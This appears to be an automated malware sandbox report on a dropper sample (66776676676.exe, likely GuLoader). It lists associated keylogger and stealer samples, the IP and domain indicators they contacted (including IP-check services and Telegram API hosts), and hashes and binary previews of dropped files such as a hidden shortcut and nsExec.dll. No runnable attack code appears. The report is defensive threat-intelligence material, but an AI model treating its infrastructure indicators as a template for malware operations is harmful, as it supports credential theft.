                                                                                                                              urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                  RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    193.122.130.087h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    checkip.dyndns.com_Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.8.169
                                                                                                                                    ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 132.226.247.73
                                                                                                                                    api.telegram.org_Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    reallyfreegeoip.org_Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 104.21.67.152
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    TELEGRAMRUpM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                    • 149.154.167.99
                                                                                                                                    QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                    • 149.154.167.99
                                                                                                                                    _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    noll.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                    • 149.154.167.99
                                                                                                                                    ORACLE-BMC-31898USla.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 129.148.164.81
                                                                                                                                    la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 132.145.4.150
                                                                                                                                    _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 158.101.44.242
                                                                                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                    • 192.29.189.21
                                                                                                                                    Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 193.122.6.168
                                                                                                                                    jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 147.154.227.181
                                                                                                                                    87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 193.122.130.0
                                                                                                                                    dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 193.122.130.0
                                                                                                                                    CLOUDFLARENETUSpM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                    • 172.64.41.3
                                                                                                                                    dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                                                    • 104.20.4.235
                                                                                                                                    c2A6GRyAwn.dllGet hashmaliciousNitolBrowse
                                                                                                                                    • 104.21.42.47
                                                                                                                                    script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                    • 104.26.12.205
                                                                                                                                    c2A6GRyAwn.dllGet hashmaliciousNitolBrowse
                                                                                                                                    • 104.21.42.47
                                                                                                                                    AWrVzd6XpC.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                    • 172.67.209.202
                                                                                                                                    Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                    • 104.21.86.72
                                                                                                                                    469oyXQbRY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                    • 104.21.64.80
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                    • 104.21.67.146
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9ad_Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                    • 172.67.177.134
                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0edlhost.exeGet hashmaliciousXWormBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    TT copy.jsGet hashmaliciousFormBookBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    Rapporteer inbreuk op auteursrechten.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    alyemenione.lnkGet hashmaliciousHavoc, QuasarBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                    • 149.154.167.220
                                                                                                                                    37f463bf4616ecd445d4a1937da06e19pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    Brooming.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    TT copy.jsGet hashmaliciousFormBookBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.217.17.65
                                                                                                                                    • 216.58.208.238
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    C:\Users\user\AppData\Local\Temp\nszF56F.tmp\nsExec.dllanziOUzZJs.exeGet hashmaliciousRemcosBrowse
                                                                                                                                      SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        PTFE Coated Butterfly Valve Picture#U00b7pdf.exeGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                          cuenta iban-ES65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                            cuenta iban-ES65.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                              cuenta iban-ES65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                cuenta iban-ES65.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  rResegregation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                    rResegregation.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                      INNORIX-Agent.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        Process:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):760
                                                                                                                                                        Entropy (8bit):3.2657394899823724
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:8wl0u0sXowAOc0RXUkl1klbRKMJGc3IrRu/3NJkKAd4t2YZ/elFlSJm:8+LRR1EZrFIrR29HAvqy
                                                                                                                                                        MD5:8D21DC36C2364239C1D579DD0FAFF5CB
                                                                                                                                                        SHA1:F281BE045D84B313F441A837561BDD01B15EDADA
                                                                                                                                                        SHA-256:2F167DD72A6FD4911BC9F2C0F4E2BA8FF4D8E2CC365C12D83118A2706810C450
                                                                                                                                                        SHA-512:26237A3F3BDADD222E2E6515DCAC02494D739589A7B2EB82023EC3FAA778E71183CE771D90940B344729F615E585A69B460419DD366CA3C0B03D71DD0AFAF021
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:L..................F........................................................7....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....h.2...........Filial195.plo.L............................................F.i.l.i.a.l.1.9.5...p.l.o.............\.....\.....\.....\.....\.F.i.l.i.a.l.1.9.5...p.l.o.7.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.c.h.i.n.a.\.M.i.x.e.r.e.n.\.v.e.r.b.a.l.i.s.e.s.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):53158
                                                                                                                                                        Entropy (8bit):5.062687652912555
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                        MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                        SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                        SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                        SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):60
                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                        Process:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3765477
                                                                                                                                                        Entropy (8bit):1.382201399927173
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:CBKpFVtoYyYATtUcULpdH3T/GaanA4ZDTE:0K3VONdTiHHrG7nzQ
                                                                                                                                                        MD5:110F2CE94DEFDC29615172811CDEFE12
                                                                                                                                                        SHA1:D2715CE6B3021DC76D82B9B7CBCF2FF081B74765
                                                                                                                                                        SHA-256:2E210CE09408F6F18DB4B848CEBC5DEEB982D71836131178CA99AD5716B5EA7C
                                                                                                                                                        SHA-512:43E5812A75BAF27660FEE33746D1E8C1D3B4DDEA60501FB93B6E98C732E9206F2EABF8557CD508858E36EE8F986A94029F6FCE240182C60861A1747CA0AAEABE
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.#......,...............................""......."...............................................k\.........................................................................................................................................................................................J...\...........>...j...............................................................................................................................g...............6...P...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6656
                                                                                                                                                        Entropy (8bit):4.994861218233575
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                                                                                                                                        MD5:B648C78981C02C434D6A04D4422A6198
                                                                                                                                                        SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                                                                                                                                        SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                                                                                                                                        SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                        • Filename: anziOUzZJs.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: rResegregation.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: rResegregation.exe, Detection: malicious, Browse
                                                                                                                                                        • Filename: INNORIX-Agent.exe, Detection: malicious, Browse
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):333501
                                                                                                                                                        Entropy (8bit):7.643247854848987
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:tJfRjspFVtoY3ChqpHSTeoUcUee4qdHTrTlnFnJVGaanAh:tBKpFVtoYyYATtUcULpdH3T/GaanAh
                                                                                                                                                        MD5:F53EEAC9A2C8712C7783BDF13E401B2B
                                                                                                                                                        SHA1:CFED633D70A8A260A8003F2164B4D1789D6BE308
                                                                                                                                                        SHA-256:7AF7AFD5DAFD279406FA57F31E56F4D92721423733A2FB32C0434B09BBCE127C
                                                                                                                                                        SHA-512:50F9B78FA28A1D83CBAAC44CDBC6110218B814FAF91A1539AC1888E2167F7D66BE5DD005D8D3EB8DED0DD34CBC7A03E062D62D01F151DDB9BFBDA5BB40B6C70B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.i.................H.&&..........IIIII.N.......y.6...o......................................E...s.....{..>>>.......................{........................)...!............''....===...................7........x......s.''.``...............))).#..........&&&.PPPP....d..<..........F...)........rr.......YYYY..............!!................{{.........~~............z.............k.vvv.z.............................................+.........._...........q....7777............1..(((.c..........D.........9....SS..]]...................................SS.....,.......""".........................F.......X....[[[............||..,,,,,,.....888........999........................ddddd...}.......;...Q...................#.................ffff.........KKK.........OO.............................................bbb...........N........o...........4.......[.............i....j. ...????....*.x.c......#.W......h........n...GGG.................FFFFFFF.''..A..<............Y.j...--.......................|.........D
                                                                                                                                                        Process:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (4391), with CRLF, LF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):70609
                                                                                                                                                        Entropy (8bit):5.19066770690377
                                                                                                                                                        Encrypted:false
